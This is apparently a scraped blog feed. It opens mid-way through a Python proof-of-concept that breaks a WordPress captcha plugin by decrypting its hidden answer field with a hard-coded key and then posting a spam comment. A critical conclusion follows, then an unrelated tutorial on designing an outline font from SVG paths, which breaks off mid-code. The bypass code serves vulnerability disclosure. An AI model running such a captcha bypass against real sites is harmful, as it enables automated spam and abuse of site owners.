<span class="n">COMMENT_POST</span> <span class="o">=</span> <span class="s2">"http://localhost/~nikolai/wordpress/wp-comments-post.php"</span> <span class="c1"># The comment form to send POST requests at.</span>
<span class="n">KEY</span> <span class="o">=</span> <span class="s2">"bws_3110013"</span>
<span class="k">def</span> <span class="nf">no_plugin</span><span class="p">(</span><span class="n">reason</span><span class="o">=</span><span class="s2">""</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'The plugin hidden fields couldn</span><span class="se">\'</span><span class="s1">t be located. Make sure it is installed. Reason: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">reason</span><span class="p">))</span>
<span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># This function reverses essentially the encoding of the hidden field cptch_result.</span>
<span class="c1"># It is exactly the same function with the same password as in the plugin source code.</span>
<span class="k">def</span> <span class="nf">reverse</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">cptch_time</span><span class="p">):</span>
<span class="c1"># just convert all but the captcha string to ascii</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">key</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'ascii'</span><span class="p">)</span>
<span class="n">cptch_time</span> <span class="o">=</span> <span class="n">cptch_time</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'ascii'</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i] Trying to decode key: </span><span class="si">{}</span><span class="s1">, captcha: </span><span class="si">{}</span><span class="s1"> and cptch_time: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">cptch_time</span><span class="p">))</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">()</span>
<span class="n">d</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">cptch_time</span><span class="p">)</span>
<span class="n">salt</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
<span class="n">slen</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">captcha</span><span class="p">)</span>
<span class="n">seq</span> <span class="o">=</span> <span class="n">key</span>
<span class="n">gamma</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">gamma</span><span class="p">)</span> <span class="o"><</span> <span class="n">slen</span><span class="p">:</span>
<span class="n">sha</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha1</span><span class="p">()</span>
<span class="n">L</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
<span class="n">L</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">seq</span><span class="p">)</span>
<span class="n">L</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">gamma</span><span class="p">)</span>
<span class="n">L</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">salt</span><span class="p">)</span>
<span class="n">sha</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">L</span><span class="p">)</span>
<span class="n">seq</span> <span class="o">=</span> <span class="n">sha</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
<span class="n">gamma</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">seq</span><span class="p">[:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">decoded</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">captcha</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="s1">'utf-8'</span><span class="p">));</span>
<span class="k">for</span> <span class="n">c</span><span class="p">,</span> <span class="n">cc</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">gamma</span><span class="p">):</span>
<span class="n">decoded</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">c</span> <span class="o">^</span> <span class="n">cc</span><span class="p">))</span>
<span class="k">return</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">decoded</span><span class="p">[</span><span class="mi">1</span><span class="p">:])</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="c1"># Obtain post parameters from comment form</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">TARGET</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occured: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">cerr</span><span class="p">))</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">terr</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="c1"># Parse parameters and solve captcha</span>
<span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">fromstring</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">el</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'cptch_block'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">ierr</span><span class="p">:</span>
<span class="n">no_plugin</span><span class="p">(</span><span class="s1">'find_class cptch_block'</span><span class="p">)</span> <span class="c1"># No such CSS class found means most likely the plugin is not installed.</span>
<span class="n">captcha</span> <span class="o">=</span> <span class="n">el</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_result'</span><span class="p">:</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_time'</span><span class="p">:</span>
<span class="n">time</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="n">el</span><span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'form-submit'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_post_ID'</span><span class="p">:</span>
<span class="n">post_id</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_parent'</span><span class="p">:</span>
<span class="n">comment_parent</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Captcha is "</span><span class="si">{}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">captcha</span><span class="p">))</span>
<span class="c1"># Try to crickiticrack it :P [Well we just use the decode() functon]</span>
<span class="n">solution</span> <span class="o">=</span> <span class="n">reverse</span><span class="p">(</span><span class="n">result</span><span class="p">,</span> <span class="n">KEY</span><span class="p">,</span> <span class="n">time</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Found solution: "</span><span class="si">{}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">solution</span><span class="p">))</span>
<span class="c1"># No write a comment with the cracked captcha to proof that we provided the</span>
<span class="c1"># correct solution.</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'author'</span><span class="p">:</span> <span class="s1">'spammer'</span><span class="p">,</span> <span class="s1">'email'</span><span class="p">:</span> <span class="s1">'spammer@spamhouse.org'</span><span class="p">,</span> <span class="s1">'url'</span><span class="p">:</span> <span class="s1">'http://spamming.com'</span><span class="p">,</span>
<span class="s1">'cptch_result'</span><span class="p">:</span> <span class="n">result</span><span class="p">,</span> <span class="s1">'cptch_time'</span><span class="p">:</span> <span class="n">time</span><span class="p">,</span> <span class="s1">'cptch_number'</span><span class="p">:</span> <span class="n">solution</span><span class="p">,</span>
<span class="s1">'comment'</span><span class="p">:</span> <span class="s2">"Hi there! No protection from spammers!!!!:D"</span><span class="p">,</span> <span class="s1">'submit'</span><span class="p">:</span> <span class="s1">'Post+Comment'</span><span class="p">,</span>
<span class="s1">'comment_post_ID'</span><span class="p">:</span> <span class="n">post_id</span><span class="p">,</span> <span class="s1">'comment_parent'</span><span class="p">:</span> <span class="n">comment_parent</span><span class="p">}</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">COMMENT_POST</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occured: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">cerr</span><span class="p">))</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">terr</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
</code></pre></div>
<h3>Conclusion</h3>
<p>Let me summarize:</p>
<ul>
<li>The captcha implementation of the plugin is bad because it does not
prevent computers from solving it (The idea behind serving
mathematical equations in this form is highly debatable).</li>
<li>The captcha author implements his own encryption function, which is
almost always a very bad idea as long as your name is not Bruce
Scheier or you aren't a mathematician.</li>
<li>The captcha plugin stores clear text passwords in the source code
visible to anyone.</li>
<li>The captcha plugin has a very big user base (Over one million
downloads) and a alarming high rating.</li>
<li>The <a href="http://bestwebsoft.com/" title="BestWebSoft">authors</a> earn money with
this shitty software and the users are left completely unsecured.</li>
</ul>
<p>Maybe the worst part of all this is, that there's also a premium version
of this plugin. And the most frightening observance: Most users are
completely unaware of the consequences from using such software (Derived
by the average high ratings for this plugin). For instance, I found the
following business comment on the vendor site. This is absolutely
ridiculous.</p>
<p><a href="https://incolumitas.com/uploads/2013/11/Screenshot-from-2013-11-04-072343.png"><img alt="Client from BestWebSoft ordering captcha for several thousand dollars without knowing the
quality." src="https://incolumitas.com/uploads/2013/11/Screenshot-from-2013-11-04-072343-1024x576.png"></a></p>
<p>Anyways, that's been it! Send me letter for Xmas!</p>Create your own font the hard way!2013-10-16T15:06:00+02:002013-10-16T15:06:00+02:00Nikolai Tschachertag:incolumitas.com,2013-10-16:/2013/10/16/create-your-own-font-the-hard-way/<p><em>Last major update on 23.10.2013</em> </p>
<h3>Preface</h3>
<p>As promised previously in my last article, I will guide you through the
creation process of a rudimentary font. I will use the glyphs of my font
to draw captchas and incorportate the implementation in my brand new
captcha plugin for wordpress. There are already quite a few captcha
plugins out there, some of them are better than mine
(<a href="http://www.google.com/recaptcha">RECAPTCHA</a>for instance translates
books and thus solves two problems at the same time),
<a href="http://wordpress.org/plugins/captcha/">others</a> are worse, because the
math equations can simply be parsed (As far as I can judge without
inspecting the code further).</p>
<p>In this article however, I will center the focus entirely on the font
and abstract from it's future usage in the captcha.</p>
<h3>Technical background of fonts</h3>
<p>A logical start of font creation is to answer the question what type of
font we are going to create. But lets first introduce some concepts that
are of importance when it comes to font design.</p>
<p>In short: A font is a collection of glyphs. Each glyph has a shape and
there are various ways of describing that shape. You can imagine a glyph
as a instanteation of a character. Whereas …</p><p><em>Last major update on 23.10.2013</em> </p>
<h3>Preface</h3>
<p>As promised previously in my last article, I will guide you through the
creation process of a rudimentary font. I will use the glyphs of my font
to draw captchas and incorportate the implementation in my brand new
captcha plugin for wordpress. There are already quite a few captcha
plugins out there, some of them are better than mine
(<a href="http://www.google.com/recaptcha">RECAPTCHA</a>for instance translates
books and thus solves two problems at the same time),
<a href="http://wordpress.org/plugins/captcha/">others</a> are worse, because the
math equations can simply be parsed (As far as I can judge without
inspecting the code further).</p>
<p>In this article however, I will center the focus entirely on the font
and abstract from it's future usage in the captcha.</p>
<h3>Technical background of fonts</h3>
<p>A logical start of font creation is to answer the question what type of
font we are going to create. But lets first introduce some concepts that
are of importance when it comes to font design.</p>
<p>In short: A font is a collection of glyphs. Each glyph has a shape and
there are various ways of describing that shape. You can imagine a glyph
as a instanteation of a character. Whereas a character is a conecpt a
glyph is a reification of that concept. When we speak of glyphs, we are
interested in the form, design and view of the character, not the
character itself as a carrier of information. Now in our latin font,
there is a one-to-one mapping of glyphs to characters. But in some other
languages there might be different glyphs for a character depending on
the adjacent characters (For instance in arabic some characters have
four or more different glyphs).</p>
<p>Now lets answer the question which font format we are going to choose.
Essentially, there are three different font types, each of them with
different advantages and drawbacks. They are:</p>
<ul>
<li>
<h4>Bitmap fonts</h4>
<p>Fonts in this format are described in a array of pixels (a bitmap).
You can imagine the array as a two-dimensional coordinate system and
when rasterizing the font you just copy that array in the coordinate
system of the output canvas. The glyph information is rather
unflexible, because there is not an easy and intuitive way to resize
the single glyphs and therefore there are usually different bitmaps
for the different sizes and stlyes of penmanships such as cursive,
bold or normal.</p>
</li>
<li>
<h4>Outline fonts</h4>
<p>This format takes a different approach. Here we won't store the
actual coordinates of glyphs. Instead we store the information of
how to draw the glyphs as a mathematical function with different
paramters which control the shape (cursive, bold, normal) and size
(12px, 36px, npx) and other aspects of the appearance of each glyph.
An outline is a set of contours or paths, and the paths consist of
Bézier splines and simple lines. The splines are normally quadratic
or cubic bezier curves. Therefore the glyphs are only rastered when
the application already determined all the parameters. Outline fonts
are very dynamic and powerful, but require a lot more of processing
power compared to bitmap fonts. Postscript and truetype fonts are
examples of this format.</p>
</li>
<li>
<h4>Stroke fonts</h4>
<p>Are stroked fonts, where each stem of the glyph is represented by
one line down the center of the stem, and the line is later drawn
with a certain widt. I am not particularly
interested in stroke fonts, but in the case you are, just read it up
in the interwebs.</p>
</li>
</ul>
<p>I will develop a outline font, but compared to
TrueType/OpenType/PostScript fonts, it will be in a very basic format
and not even include the full alphabet (Just around 10-15 characters).
Furthermore I will use quadratic and cubic Bézier splines. The glyphs
will be of very very easy shape (Each glyph will essentially be only a
path), but for some characters I will add some additional parameters to
illustrate the entire possibilities. The final plugin written in PHP
will be able to save the captchas to png and bbm files, both of them are
bitmap formats.<br>
It'd be certainly possible to directly use vector graphic techniques
(Such as scalable vector graphics) and let the plugin just generate
them. As a layman, I think this would be considerably faster and a
<em>better</em> solution, since I can use the high level language SVG and the
rasterization process will happen on the client-side and not on the
server as in my intentional approach.</p>
<h3>Why is this faster?</h3>
<p>Because the most time consuming process is the rasterization of the
specific Bézier splines and simple lines that define the single glyphs
of the font. SVG files just describe the shape of these characters, but
the final drawing process to the monitor happens in the browser of the
client.<br>
But on the other side, I guess that .svg captchas are more easily
deciphered (OCR in short), because the cracker does not have to remove
noise and guess the bitmap structure which comprises the actual letters
(Please leave a comment if you think differently).<br>
That being said, I will still use the latter way (Plotting my captcha
directly and producing bitmap pictures like PNG's) in the full
conscience that it might be the worse solution (Heck, writing captcha
software in 2013 <em>is</em> certainily a bad idea). But all this is legitmated
with the fruitful learning process that accompanies the coding process.</p>
<p>Now in the case you shrug your shoulders when I mention Bézier curves,
consider reading my <a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">previous blog
article</a> that
also includes a bunch of links to very nice resources. Be aware that
quite a bit of math hides behind Bézier splines and that I won't use
heavily optimized algorithms for plotting the splines, simply out of the
reason that I don't have the mathematical/algorithmic knowledge and
skill to do so.</p>
<p>If I got you hooked and you also want to create your own fonts and you
want to really use them everywhere and save them in a offical format
such as PostScript, SVG or TrueType/OpenType, consider the application
FontForge [Link goes here], that helps you quite a lot and bewares you
of the quirky low level plotting algorithms. For my font, I just use
FontForge and Inkscape to get a look and feel experience of how my
glyphs sould look like, since it's kinda hard to think entirely in
points and control points of Bézier splines without actually drawing
them ;)</p>
<h3>Approach</h3>
<p>Because I needed some kind of sketch board to develop and design my
glyphs, I looked for a vector graphics application.
<a href="http://inkscape.org">Inkscape</a> really fit perfectly and it generates
easy parsable .svg files. Then I created a little script that was
capable of exporting the Bézier points and line points of the .svg files
generated by Inkscape. That wasn't too hard, since .svg is a W3C
standard and the <path> element is perfectly described
<a href="http://www.w3.org/TR/SVG/paths.html#Introduction">here</a>.</p>
<p>The export script I made looks like this (Please consider that only
closed paths and cubic/quadratic and lines are properly parsed! If this
is not enough for your pupose, the script is easy extendable tough):</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Parse inkscap svg files and tries to obtain all bezier curves points and lines.</span>
<span class="c1"># Assumes that only one glyph is drawn and extracts ALL bezier points </span>
<span class="c1"># in the main (called 'layer1' in inkscape). Only heterogenous bezier </span>
<span class="c1"># paths and straight lines are parsed correctly.</span>
<span class="c1"># Read: http://www.w3.org/TR/SVG/paths.html#Introduction</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 14.10.2013</span>
<span class="c1"># Site: incolumitas.com</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">try</span><span class="p">:</span>
<span class="kn">from</span> <span class="nn">lxml</span> <span class="kn">import</span> <span class="n">etree</span>
<span class="k">except</span> <span class="ne">ImportError</span><span class="p">:</span>
<span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'Ohh boy, it seems that you didn</span><span class="se">\'</span><span class="s1">t install lxml. Try "pip install lxml"</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">InvalidGlyphShape</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> This Exception is raised when the parser discovers a element</span>
<span class="sd"> that he cannot read.</span>
<span class="sd"> '''</span>
<span class="c1"># lxml is awesome </span>
<span class="k">def</span> <span class="nf">parse_glyph</span><span class="p">(</span><span class="n">fname</span><span class="p">):</span>
<span class="k">for</span> <span class="n">event</span><span class="p">,</span> <span class="n">element</span> <span class="ow">in</span> <span class="n">etree</span><span class="o">.</span><span class="n">iterparse</span><span class="p">(</span><span class="n">fname</span><span class="p">,</span> <span class="n">tag</span><span class="o">=</span><span class="s1">'{*}g'</span><span class="p">):</span> <span class="c1"># "{*}" includes the whole xml namespace</span>
<span class="k">if</span> <span class="n">element</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="o">==</span> <span class="s1">'layer1'</span><span class="p">:</span> <span class="c1"># Inkscape packs all the shapes in a container and calls it "layer1" by default</span>
<span class="k">for</span> <span class="n">path</span> <span class="ow">in</span> <span class="n">element</span><span class="o">.</span><span class="n">iter</span><span class="p">(</span><span class="n">tag</span><span class="o">=</span><span class="s1">'{*}path'</span><span class="p">):</span> <span class="c1"># Find ALL(!) path elements</span>
<span class="k">yield</span> <span class="n">path</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'d'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">parse_path</span><span class="p">(</span><span class="n">fname</span><span class="p">):</span>
<span class="c1"># What format do we need? List of sequence of tuples</span>
<span class="c1"># like [[(43,233), (4434, 222), (87, 387)], [(63,23), (44, 12), (87, 337)], ...]</span>
<span class="c1"># each of them constituting points of a cubic Bézier spline.</span>
<span class="c1"># ... Analogeous for the other shapes...</span>
<span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">parse_glyph</span><span class="p">(</span><span class="n">fname</span><span class="p">):</span>
<span class="n">lines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">c_splines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">q_splines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
<span class="k">if</span> <span class="n">data</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'z'</span><span class="p">:</span>
<span class="k">raise</span> <span class="n">InvalidGlyphShape</span><span class="p">(</span><span class="s1">'Path is not a closed shape'</span><span class="p">)</span>
<span class="c1"># If a moveto is followed by multiple pairs of coordinates,</span>
<span class="c1"># the subsequent pairs are treated as implicit lineto commands.</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">(</span><span class="s1">'M'</span><span class="p">,</span> <span class="s1">'m'</span><span class="p">):</span>
<span class="k">raise</span> <span class="n">InvalidGlyphShape</span><span class="p">(</span><span class="s1">'No move command Mm'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span> <span class="c1"># Check for implicit lineto cmd.</span>
<span class="k">if</span> <span class="p">(</span><span class="ow">not</span> <span class="n">is_cmd</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">is_cmd</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">1</span><span class="p">])):</span>
<span class="n">lines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">:]),</span> <span class="mi">2</span><span class="p">)])</span> <span class="c1"># Lil hack here :)</span>
<span class="c1"># Magic parsing begins. Very basic parser.</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Cc'</span><span class="p">:</span>
<span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">c_splines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">4</span><span class="p">)])</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Qq'</span><span class="p">:</span>
<span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">q_splines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">3</span><span class="p">)])</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Ll'</span><span class="p">:</span>
<span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">lines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">2</span><span class="p">)])</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Zz'</span> <span class="ow">and</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">:</span> <span class="c1"># closepath (close the current shape by drawing a line to the last moveto)</span>
<span class="c1"># With "closepath", the end of the final segment of the subpath is "joined"</span>
<span class="c1"># with the start of the initial segment of the subpath.</span>
<span class="n">lines</span><span class="o">.</span><span class="n">append</span><span class="p">([</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">]])</span>
<span class="n">cleaned</span> <span class="o">=</span> <span class="n">clean</span><span class="p">(</span><span class="n">cubic_bezier</span><span class="o">=</span><span class="n">c_splines</span><span class="p">,</span>
<span class="n">quadratic_bezier</span><span class="o">=</span><span class="n">q_splines</span><span class="p">,</span>
<span class="n">simple_lines</span><span class="o">=</span><span class="n">lines</span><span class="p">)</span>
<span class="k">yield</span> <span class="n">cleaned</span>
<span class="c1"># clean the data. For some reason my algorithm yields single points. Just</span>
<span class="c1"># remove them and the data is solid. </span>
<span class="k">def</span> <span class="nf">clean</span><span class="p">(</span><span class="o">**</span><span class="n">args</span><span class="p">):</span>
<span class="n">keys</span> <span class="o">=</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">keys</span><span class="p">())</span>
<span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="n">e</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">e</span><span class="p">)</span> <span class="o">></span> <span class="mi">1</span><span class="p">]</span>
<span class="c1"># Make integer coordinates ready to be rasterized. </span>
<span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
